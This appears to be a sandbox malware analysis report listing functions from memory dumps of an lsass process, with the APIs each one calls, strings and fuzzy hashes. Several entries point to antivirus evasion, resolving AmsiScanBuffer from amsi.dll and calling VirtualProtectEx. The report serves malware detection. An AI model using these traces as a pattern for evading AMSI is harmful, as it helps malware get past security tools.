Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd

Similarity

API ID: AddressLibraryLoadProcSleep
String ID: AmsiScanBuffer$amsi.dll
API String ID: 188063004-3248079830
Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction ID: a245ed26a221fb78eb87d517e28400a17b747c725b83cbba154e270bfc0e25b6
Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction Fuzzy Hash: F6D0673065DF08D5EA0A6F55FC553E42271AFA4B01FDC0425C50E412A6DE2E85DFC340

Function 0000017D2DD55810 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000017D2DD55896

Memory Dump Source

Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true

Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction ID: 8125674789d92a5479a628aecd600cb6081226b1809075a8aed29d4977de2a50
Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction Fuzzy Hash: F202B63221DB8886EB61CF55F4903AAB7B0F785794F140015EA8E87BA9DBBCD495CB00

Function 0000017D2DD85810 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000017D2DD85896

Memory Dump Source

Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true

Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction ID: 4faac7553353a4bb9109001915d92b04d98a9b0ad03f34982137517f5874144b
Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction Fuzzy Hash: 1202FB3211DB8486E761CB55F49039AB7B1F7C4794F284016EA8E87BA9DF7CD496CB00

Function 0000017D2DD52C80 Relevance: 7.6, APIs: 6, Instructions: 131COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 0000017D2DD52CAD
TlsGetValue.KERNEL32 ref: 0000017D2DD52CBC
TlsGetValue.KERNEL32 ref: 0000017D2DD52CCB
TlsSetValue.KERNEL32 ref: 0000017D2DD52E0F
TlsSetValue.KERNEL32 ref: 0000017D2DD52E1E
TlsSetValue.KERNEL32 ref: 0000017D2DD52E2D

Memory Dump Source

Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true

Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction ID: 8766a97f31f53a2c0922cdae98632e9cd144d5ee2a52e1ef2e78a76bd73733b5
Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction Fuzzy Hash: 60518335608F0587E764CB16F84079AB7B0FB84B84F5881199E4E43756DF78C98BCB80

Function 0000017D2DD82C80 Relevance: 7.6, APIs: 6, Instructions: 131COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 0000017D2DD82CAD
TlsGetValue.KERNEL32 ref: 0000017D2DD82CBC
TlsGetValue.KERNEL32 ref: 0000017D2DD82CCB
TlsSetValue.KERNEL32 ref: 0000017D2DD82E0F
TlsSetValue.KERNEL32 ref: 0000017D2DD82E1E
TlsSetValue.KERNEL32 ref: 0000017D2DD82E2D

Memory Dump Source

Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true

Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction ID: c0c11d9e0e791decef7c450a5b00cf9e397162e903bcabc121417c3cfe85881c
Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction Fuzzy Hash: 8C516F3560CB0587E766CB16F84079ABBB0FB84B84F6C8129DD4E83756DB39C9878B40

Function 0000017D2DD52AB4 Relevance: 7.6, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 0000017D2DD52AE1
TlsGetValue.KERNEL32 ref: 0000017D2DD52AF0
TlsGetValue.KERNEL32 ref: 0000017D2DD52AFF
TlsSetValue.KERNEL32 ref: 0000017D2DD52C3B
TlsSetValue.KERNEL32 ref: 0000017D2DD52C4A
TlsSetValue.KERNEL32 ref: 0000017D2DD52C59

Memory Dump Source

Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true

Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction ID: 954548f2d2f2eb1727b34777494260f77ffc5ea29933f4fc2f9ab99450d76c11
Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction Fuzzy Hash: 23516335218B498BE724CF16B84079AB7B1FB84B84F584119DE4E4375ADF78D98BCB40

Function 0000017D2DD82AB4 Relevance: 7.6, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 0000017D2DD82AE1
TlsGetValue.KERNEL32 ref: 0000017D2DD82AF0
TlsGetValue.KERNEL32 ref: 0000017D2DD82AFF
TlsSetValue.KERNEL32 ref: 0000017D2DD82C3B
TlsSetValue.KERNEL32 ref: 0000017D2DD82C4A
TlsSetValue.KERNEL32 ref: 0000017D2DD82C59

Memory Dump Source

Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true

Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction ID: 6a12a7281aac09f8d6c5c6291dd5d0003b29e4a6000463bcaf97762cff550334
Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction Fuzzy Hash: EC514035218B498BE725CF16B84079AB7B0FB84B84F588119DD4E8375ADB39E987CB00

Function 0000017D2DD55E50 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000017D2DD55E66

Memory Dump Source

Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true

Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction ID: a0d3d935ebb2149f436fe8553ea03842cde1fcc6533f6d8c8d18eb5ce2a62dd7
Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction Fuzzy Hash: 3E61B63612DB8886E761CF15F4543AAB7B0F788744F540115FA8D87BAADBBCD586CB00

Function 0000017D2DD85E50 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000017D2DD85E66

Memory Dump Source

Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true

Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction ID: aadab68108afb3d45a975aa90a1c62a39548663b6fcc21350131460ce12e4cd8
Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction Fuzzy Hash: 5561D93652CB8886E761CB15F44036AB7B1F788744F684116FA8D83BA9DB7CC586CB00

Function 0000017D2DD53EC8 Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,0000017D2DD53A5B), ref: 0000017D2DD53EDB
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000017D2DD53A5B), ref: 0000017D2DD53F0E
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000017D2DD53A5B), ref: 0000017D2DD53F2E
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000017D2DD53A5B), ref: 0000017D2DD53F47
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000017D2DD53A5B), ref: 0000017D2DD53F68

Memory Dump Source

Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true

Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction ID: 7a4681845d68765c2fe651341d7c065f2c313b53bf4c6282e3f71e70ffd23cd5
Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction Fuzzy Hash: 5C114F36609B4493EB248B61F40429AA7B0FF45B80F080126DE8D037A9EF7DC9DAC7C4

Function 0000017D2DD83EC8 Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,0000017D2DD83A5B), ref: 0000017D2DD83EDB
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000017D2DD83A5B), ref: 0000017D2DD83F0E
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000017D2DD83A5B), ref: 0000017D2DD83F2E
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000017D2DD83A5B), ref: 0000017D2DD83F47
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000017D2DD83A5B), ref: 0000017D2DD83F68

Memory Dump Source

Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true

Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction ID: 2d873f16d66e6ad334d11c34629bcde1895a150ea79aa41e247f0e4022255a44
Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction Fuzzy Hash: 19112E3660DB4493EF258F21F40439A67B0FB45B80F1C4126DA8D83799EB7DC99AC784

Function 0000017D2DD58CA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000017D2DD58CCB
_IsNonwritableInCurrentImage.LIBCMT ref: 0000017D2DD58D62
RtlUnwindEx.NTDLL ref: 0000017D2DD58DBC

Strings

csm, xrefs: 0000017D2DD58D49

Memory Dump Source

Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true

Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: 875f8e91b8ec60e369ef0c0a4fa31e9cbd0d42de610c1aa331d7fb3e193f8215
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: 1351CF32359F08CAEB58CB55F444BAC37B1EB54B98F188121DA5E4778ADBB9C8D2C700

Function 0000017D2DD88CA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000017D2DD88CCB
_IsNonwritableInCurrentImage.LIBCMT ref: 0000017D2DD88D62
RtlUnwindEx.NTDLL ref: 0000017D2DD88DBC

Strings

csm, xrefs: 0000017D2DD88D49

Memory Dump Source

Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true

Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: f573f4fdb9b547cf28fdda7db820dacec59f80b345142f6cbdf1435a977ec1d3
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: 6C51B032259F088ADB5ACF55F444BAC77B1EB54B98F2C4120DA5E8778AD779C883C700

Function 0000017D2DD5A6FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 0000017D2DD5A75B
_CallSETranslator.LIBVCRUNTIME ref: 0000017D2DD5A7A7

Strings

RCC, xrefs: 0000017D2DD5A777
MOC, xrefs: 0000017D2DD5A76F

Memory Dump Source

Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true

Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: d9f36c28b8368ba67f33a76669638aa3bbfff7f91a8384785df6904ca07c6f67
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: A1617C3250CBC885EB208B15F4407DABBB0FB95B98F485215EB9C17B96DBB8D1D6CB00

Function 0000017D2DD5AAAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000017D2DD5AAD4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 0000017D2DD5ABBC

Strings

csm, xrefs: 0000017D2DD5AC0E
csm, xrefs: 0000017D2DD5AAF6

Memory Dump Source

Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true

Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: 611d291301d54a95b7270af50630b4b285e2c5ae5dac77d113480ec9eb855077
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: 6951C13610CB988BEB748F12A5443A877B0FB50B84F1C6116DA9D47BD2CBB8E4E6C741

Function 0000017D2DD29EAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000017D2DD29ED4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 0000017D2DD29FBC

Strings

csm, xrefs: 0000017D2DD2A00E
csm, xrefs: 0000017D2DD29EF6

Memory Dump Source

Source File: 00000009.00000003.1782464858.0000017D2DD20000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000017D2DD20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_3_17d2dd20000_lsass.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: 9924569a5ab876b337d3d8800d55b27160b79a26f432793cf3b9df684b44e794
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: 7251803218CB488AEB748F11A68839877B0FB55B94F1C5116DA9D47B9FCB38C4D6CB01

Function 0000017D2DD8A6FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 0000017D2DD8A75B
_CallSETranslator.LIBVCRUNTIME ref: 0000017D2DD8A7A7

Strings

RCC, xrefs: 0000017D2DD8A777
MOC, xrefs: 0000017D2DD8A76F

Memory Dump Source

Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true

Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: 649d633d447bc471339a97788d72ab742860506d99827fa6d212f61556e560f6
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: 21617C3250CBC885EB629B15F4407DAB7B0FB85B98F585215EB9C53B96DB78C1D2CB00

Function 0000017D2DD8AAAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000017D2DD8AAD4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 0000017D2DD8ABBC

Strings

csm, xrefs: 0000017D2DD8AAF6
csm, xrefs: 0000017D2DD8AC0E

Memory Dump Source

Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true

Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: dfdec56db3823318c9e025b071a3336cc024d0b78a8e750ecd046d09345923fd
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: 1F51713610CB4887EB768F12A54439877B1FB54B94F2C6116DA9D87B96CB38E4D3C701

Function 0000017D2DD53950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

StrCmpNW.SHLWAPI ref: 0000017D2DD53972
